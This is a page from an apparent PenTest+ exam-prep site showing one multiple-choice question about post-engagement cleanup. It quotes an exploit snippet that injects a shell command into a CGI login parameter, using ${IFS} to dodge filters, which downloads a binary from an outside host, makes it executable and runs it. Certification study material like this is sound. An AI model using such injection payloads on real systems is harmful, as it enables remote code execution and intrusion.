List of questions
Related questions
Question 40 - PT0-002 discussion
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I
FS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
A.
grep -v apache ~/.bash_history > ~/.bash_history
B.
rm -rf /tmp/apache
C.
chmod 600 /tmp/apache
D.
taskkill /IM "apache" /F
Your answer:
0 comments
Sorted by
Leave a comment first